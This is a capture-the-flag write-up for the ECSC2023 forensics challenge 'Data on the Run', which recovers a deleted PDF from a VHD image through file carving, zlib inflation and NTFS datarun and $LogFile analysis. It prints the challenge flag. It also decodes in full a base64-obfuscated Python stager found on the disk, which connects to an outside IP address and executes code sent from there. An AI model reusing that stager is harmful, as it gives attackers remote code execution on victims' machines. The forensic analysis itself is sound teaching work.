ECSC2023 - Data on the Run

2023-11-30 1144 words 6 minutes

Contents

During this challenge, our objective is to recover a deleted PDF from a drive where MBR is broken. To achieve this, we delve into parsing the transaction history stored in $LogFile to identify the locations of file data scattered across the disk.

Description

I was using my Windows virtual machine and as soon as I downloaded what I assumed to be another research paper to add to my evergrowing collection, when suddenly my screen went blank! When I rebooted the VM all of my data was gone… Among the data lost was a crucial file that had a top secret report! Now I’m on the run to recover my lost data…

SHA256(chall.vhd) = fb3141dc4aee5a129e61192c134d32207d4f39b0fa1fb4a19aa156330f53b834

CTF solve

The challenge begin with a disk image called chall.vhd. However, we can’t mount it due to apparent MBR corruption, specifically the absence of a partition table.

In an attempt to recover data, Autopsy employs file carving on the image after ingesting it. Through this method, we discover the presence of a downloaded file named FlagReport.pdf from the internet.

1
2
3
4
5


[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://downloads3.sejda.com/api/tasks/CJEKB1VP-202209210447/download/Fl
.pdf?s=web-KOiaolqn8GEeyjHrXlqnPyTs0UyOAZZT3fP5T&v=true&_s=8
HostUrl=https://downloads3.sejda.com/api/tasks/CJEKB1VP-202209210447/download/Flag.pdf?s=web-KOiaolqn8GEeyjHrXlqnPyTs0UyOAZZT3fP5T&v=true&_s=8

Verification through MFT Browser confirms the file existence.

Unfortunately, the Data Run value for this file is null.

Two other carved files with a .sh extension catch our attention.

Decoding their base64 content reveals another layer of encoding :

1
2


$ script="ZXhlYyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFeU5DNDBNeTR4TXpBdU1UZ3pKeXcwTWpReUtTa0tDUWxpY21WaGF3b0paWGhqWlhCME9nb0pDWFJwYldVdWMyeGxaWEFvTlNrS2JEMXpkSEoxWTNRdWRXNXdZV05yS0NjK1NTY3NjeTV5WldOMktEUXBLVnN3WFFwa1BYTXVjbVZqZGloc0tRcDNhR2xzWlNCc1pXNG9aQ2s4YkRvS0NXUXJQWE11Y21WamRpaHNMV3hsYmloa0tTa0taWGhsWXloNmJHbGlMbVJsWTI5dGNISmxjM01vWW1GelpUWTBMbUkyTkdSbFkyOWtaU2hrS1Nrc2V5ZHpKenB6ZlNrSycpWzBdKSkg"
$ echo "$script" | base64 --decode

1

exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNC40My4xMzAuMTgzJyw0MjQyKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK')[0])) %

We discover a Python script capable of executing commands from a remote host.

1

$ echo "aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNC40My4xMzAuMTgzJyw0MjQyKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK" | base64 -d

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


import socket,zlib,base64,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('124.43.130.183',4242))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})

A second .sh script mirrors the first, differing only in IP and port details.

Given that PDFs use ZLIB compression, our approach involves attempting to inflate all identified zlib streams in order to retrieve the flag.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


import zlib

def inflate(data):
    decompress = zlib.decompressobj(
            -zlib.MAX_WBITS
    )
    inflated = decompress.decompress(data)
    inflated += decompress.flush()
    return inflated

f = open("chall.vhd", "rb").read()
g = open(f"out.txt", "w")

i = 0
total_i = 0

while True:
    i = f.find(b"x\x9c")
    total_i += i
    print(hex(total_i))
    if i == -1:
        break
    try:
        s = inflate(f[i+2:i+2 + 0x400])
        g.write(f"{total_i:016x}: {s!r}\n")
        g.flush()
    except Exception as e:
        print(e)
        pass

    f = f[i + 1:]

That method gives us the flag:

1
2


00000000006b2164: b'Q\nBT\n0 Tr\n/DeviceRGB cs\n0.82745 0.18431 0.18431 sc\n/F3 35 Tf\n1 0 0 1 48 79
Tm\n(HTB{C3rTiF13d_C4rv1N9_sk1L1}) Tj\n0 Tr\nET\n'

Real world solve

Another way, of doing the challenge (much smarter), is to delve into the workings of NTFS and MFT.

Within the MFT, each file is represented by a record containing crucial metadata, such as file names, timestamps, and file attributes. For files with a size below 1024 bytes, the content is stored directly within the MFT entry, and this type is referred to as a “resident entry”. If a file is larger, the entry is designated as “non-resident”. In such cases, the entry includes a reference, known as a datarun, pointing to the clusters on the disk where the actual file data is stored. It’s important to note that the file data may be distributed across multiple non-contiguous clusters.

Concerning the bash script extracted from MFT Browser, a value for DataRun field is set :

The value given is 21012A1D, which is decomposed in 4 parts (sources).

The second byte 1 represents the number of bytes following this one which designate the size in clusters of the data block 01. {cluster_size} * {run_size}
The first byte 2 indicates the number of bytes following the one defining the size. It designates the offset where starts the data block 1D2A (little-endian). {cluster_size} * {data_block_start} + {beginning_partition_offset}

beginning_partition_offset = 0x10000 (start of xxxNTFS)

cluster_size = 0x1000 = 4096

data_block_start = 0x1D2A = 7466

1
2
3
4


>>> hex(4096 * 7466 + 0x10000) # data run start offset
'0x1d3a000'
>>> hex(1*0x1000) # Size of data run
'0x1000'

Upon selecting the DataRun field in MFT Browser, the start offset in decimal is also provided (excluding the beginning_partition_offset).

$LogFile maintains transaction history for the $MFT. Parsing this history through the VHD file is achievable using LogFileParser :

Filtering on FlagReport.pdf, identification of the initial dataruns is possible.

Alternatively, manually exploring the drive reveals the same information.

We’ve created a script to retrieve details about the dataruns 222C0588052292010F1600 associated with the file FlagReport.pdf.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60


import io
import struct

# Stolen from https://github.com/fox-it/dissect.ntfs/blob/main/dissect/ntfs/c_ntfs.py#L614
def varint(buf: bytes) -> int:
    """Parse variable integers.

    Dataruns in NTFS are stored as a tuple of variable sized integers. The size of each integer is
    stored in the first byte, 4 bits for each integer. This logic can be seen in
    :func:`AttributeHeader.dataruns <dissect.ntfs.attr.AttributeHeader.dataruns>`.

    This function only parses those variable amount of bytes into actual integers. To do that, we
    simply pad the bytes to 8 bytes long and parse it as a signed 64 bit integer. We pad with 0xff
    if the number is negative and 0x00 otherwise.

    Args:
        buf: The byte buffer to parse a varint from.
    """
    if len(buf) < 8:
        buf += (b"\xff" if buf[-1] & 0x80 else b"\x00") * (8 - len(buf))

    return struct.unpack("<q", buf)[0]

# Stolen from https://github.com/fox-it/dissect.ntfs/blob/main/dissect/ntfs/attr.py#L197
def dataruns(dataruns: bytes) -> list[tuple[int, int]]:
    """Return the dataruns of this attribute.
    """

    fh = io.BytesIO(dataruns)

    runs = []
    run_offset = None
    run_size = None
    offset = 0

    while True:
        value = fh.read(1)[0]  # Get the integer value
        if value == 0:
            break

        size_len = value & 0xF
        offset_len = (value >> 4) & 0xF

        run_size = varint(fh.read(size_len))
        if offset_len == 0:  # Sparse run
            run_offset = None
        else:
            run_offset = offset = offset + varint(fh.read(offset_len))

        runs.append((run_offset, run_size))

    return runs

def get_offset_file(dataruns: list, sector_size: int = 0x1000, starting_offset: int = 0x10000):
    for datarun in dataruns:
        print(f"[+] Data run offset : {hex((datarun[0] * sector_size) + starting_offset)}")
        print(f"[+] Data run size : {hex((datarun[1] * sector_size) + starting_offset)}")

dataruns = dataruns(bytes.fromhex("222C0588052292010F1600"))
get_offset_file(dataruns)

1
2
3
4
5
6
7


$ python3 dataruns.py
[+] Data run start offset : 0x598000
[+] Data run end offset : 0xac4000
[+] Data run size : 0x52c000
[+] Data run start offset : 0x1ba7000
[+] Data run end offset : 0x1d39000
[+] Data run size : 0x192000

Extracting data from the specified addresses allows the reconstruction of the PDF containing the flag.

Contents

ECSC2023 - Data on the Run

Description

CTF solve

Real world solve

Sources